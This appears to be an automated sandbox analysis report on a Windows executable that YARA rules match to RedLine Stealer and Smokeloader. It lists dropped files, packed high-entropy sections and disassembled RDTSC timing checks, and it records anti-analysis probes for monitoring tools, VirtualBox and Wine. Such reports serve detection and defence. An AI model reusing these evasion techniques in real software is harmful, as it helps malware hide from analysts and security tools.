Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D3424 1_2_005D3424
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DF0C2 1_2_005DF0C2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004880F8 1_2_004880F8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DBC9E 1_2_005DBC9E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E2576 1_2_005E2576
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E4117 1_2_005E4117
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CFD32 1_2_005CFD32
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CC92C 1_2_005CC92C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D1923 1_2_005D1923
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00480DE6 1_2_00480DE6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005451A1 1_2_005451A1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E0E0A 1_2_005E0E0A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004CAA36 1_2_004CAA36
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D6AC2 1_2_005D6AC2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005252FE 1_2_005252FE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DD691 1_2_005DD691
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00494298 1_2_00494298
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004BBE93 1_2_004BBE93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004FBAAA 1_2_004FBAAA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CAEA6 1_2_005CAEA6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D4F44 1_2_005D4F44
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CE32C 1_2_005CE32C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E56 1_2_006F5E56
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E84 1_2_006F5E84
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E93 1_2_006F5E93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493EE2E 1_2_0493EE2E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933FA7 1_2_04933FA7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04945995 1_2_04945995
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493B937 1_2_0493B937
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493F170 1_2_0493F170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04940BA7 1_2_04940BA7
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0493AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: file.exe, 00000001.00000003.1734839314.000000000526C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000001.00000003.1734619327.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9951234076433121
Source: file.exe Static PE information: Section: olgpsnjw ZLIB complexity 0.99229768222981
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04788464 CreateToolhelp32Snapshot,Module32First, 1_2_04788464
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4708
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\23RE4w32fN
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Cleaner.lnk.1.dr LNK file: ..\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
Source: file.exe Static file information: File size 1995776 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of olgpsnjw is bigger than: 0x100000 < 0x1a5000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olgpsnjw:EW;sccxqdxh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.1.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: dll[1].1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Y-Cleaner.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: soft[1].1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1e843a should be: 0x1f6ecf
Source: Bunifu_UI_v1.5.3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: olgpsnjw
Source: file.exe Static PE information: section name: sccxqdxh
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A237 push ecx; ret 1_2_0040A24A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00421B7D push esi; ret 1_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E891 push ecx; ret 1_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push ecx; mov dword ptr [esp], esi 1_2_005F8363
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push edi; mov dword ptr [esp], esp 1_2_005F8367
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F4CB5 push 186079D5h; mov dword ptr [esp], edi 1_2_005F7347
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 1093FA19h; mov dword ptr [esp], edx 1_2_0060B0F1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 466D9CC7h; mov dword ptr [esp], eax 1_2_0060B10E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006D487F push eax; ret 1_2_006D488E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C687B push 1AB8BC02h; mov dword ptr [esp], edx 1_2_006C6883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 03F8F741h; mov dword ptr [esp], ecx 1_2_00601900
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 6842EF4Ah; mov dword ptr [esp], ebx 1_2_0060192F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006B2058 push 68E70CBCh; mov dword ptr [esp], esp 1_2_006B20D4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065C05D push esi; mov dword ptr [esp], eax 1_2_0065C0BC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push 45CCCACCh; mov dword ptr [esp], esi 1_2_00690865
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push ecx; mov dword ptr [esp], 55ED2DE4h 1_2_00690883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00684037 push edi; mov dword ptr [esp], ecx 1_2_00684071
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0067F803 push 69F21E02h; mov dword ptr [esp], ecx 1_2_0067F860
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00651012 push 77CB7FF6h; mov dword ptr [esp], ebp 1_2_0065104B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C601B push ebx; mov dword ptr [esp], esi 1_2_006C603E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 529E7051h; mov dword ptr [esp], esi 1_2_00664904
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 366DB9F7h; mov dword ptr [esp], ebx 1_2_00664928
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0068F0D1 push ecx; mov dword ptr [esp], edi 1_2_0068F17A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push edx; mov dword ptr [esp], ecx 1_2_0065A8DB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push 01276239h; mov dword ptr [esp], ebx 1_2_0065A95B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006ED89C push 301729F5h; mov dword ptr [esp], esi 1_2_006ED8C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060309A push 6E37A73Dh; mov dword ptr [esp], ecx 1_2_006030D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00654973 push eax; mov dword ptr [esp], 4C2A23B8h 1_2_006549B1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006AA94D push 4B1E0A33h; mov dword ptr [esp], ebx 1_2_006AA973
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006BA136 push 49BEE2D7h; mov dword ptr [esp], ebx 1_2_006BA1D9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0066E110 push eax; mov dword ptr [esp], ebx 1_2_0066E131
Source: file.exe Static PE information: section name: entropy: 7.942270007630704
Source: file.exe Static PE information: section name: olgpsnjw entropy: 7.949609738056107
Source: Y-Cleaner.exe.1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAA second address: 5E9EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAE second address: 5E9EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE82 second address: 5CDE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE86 second address: 5CDE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE8E second address: 5CDE93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92B7 second address: 5E92E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FCBA46BC736h 0x0000000b jmp 00007FCBA46BC744h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jns 00007FCBA46BC742h 0x0000001a jo 00007FCBA46BC736h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9421 second address: 5E9428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9428 second address: 5E942D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9704 second address: 5E9734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA4817E7Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FCBA4817E86h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9734 second address: 5E973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E973C second address: 5E9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC3F0 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA46BC744h 0x00000011 popad 0x00000012 nop 0x00000013 add dword ptr [ebp+122D1F8Fh], ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1C48h], edx 0x00000022 mov dword ptr [ebp+122D1C34h], esi 0x00000028 popad 0x00000029 call 00007FCBA46BC739h 0x0000002e jmp 00007FCBA46BC73Dh 0x00000033 push eax 0x00000034 jnp 00007FCBA46BC748h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnc 00007FCBA46BC751h 0x00000044 pushad 0x00000045 jc 00007FCBA46BC736h 0x0000004b jmp 00007FCBA46BC743h 0x00000050 popad 0x00000051 mov eax, dword ptr [eax] 0x00000053 jnp 00007FCBA46BC73Eh 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jp 00007FCBA46BC744h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49A second address: 5EC49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49E second address: 5EC4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, 76h 0x00000009 push 00000003h 0x0000000b mov si, 8A00h 0x0000000f push 00000000h 0x00000011 cmc 0x00000012 movsx edx, ax 0x00000015 push 00000003h 0x00000017 movzx edi, dx 0x0000001a push A13DCAF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C3 second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4D3 second address: 5EC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1EC2350Ah 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBA46BC738h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cld 0x0000002a lea ebx, dword ptr [ebp+1244C2DBh] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FCBA46BC738h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1A4Bh], edi 0x00000050 or dword ptr [ebp+122D1A4Bh], esi 0x00000056 mov ecx, dword ptr [ebp+122D3906h] 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e jmp 00007FCBA46BC745h 0x00000063 jbe 00007FCBA46BC74Ch 0x00000069 jmp 00007FCBA46BC746h 0x0000006e popad 0x0000006f push eax 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007FCBA46BC736h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5D7 second address: 5EC5DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5DC second address: 5EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007FCBA46BC739h 0x00000010 push 00000000h 0x00000012 jbe 00007FCBA46BC737h 0x00000018 call 00007FCBA46BC739h 0x0000001d jmp 00007FCBA46BC742h 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC619 second address: 5EC61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC61D second address: 5EC680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC745h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jo 00007FCBA46BC74Bh 0x00000015 jmp 00007FCBA46BC745h 0x0000001a push edi 0x0000001b js 00007FCBA46BC736h 0x00000021 pop edi 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 jo 00007FCBA46BC73Eh 0x0000002b jne 00007FCBA46BC738h 0x00000031 pushad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c jg 00007FCBA46BC736h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7BA second address: 5EC806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E85h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FCBA4817E7Ah 0x00000016 jno 00007FCBA4817E7Ch 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007FCBA4817E80h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC806 second address: 5EC827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FCBA46BC738h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB13 second address: 60CB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E85h 0x00000009 pop ebx 0x0000000a ja 00007FCBA4817E7Ch 0x00000010 jl 00007FCBA4817E78h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB44 second address: 60CB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB4A second address: 60CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jbe 00007FCBA4817E8Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AB0C second address: 60AB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC744h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 jns 00007FCBA46BC73Ah 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AC96 second address: 60ACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCBA4817E76h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA3 second address: 60ACA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA8 second address: 60ACAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE01 second address: 60AE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE09 second address: 60AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
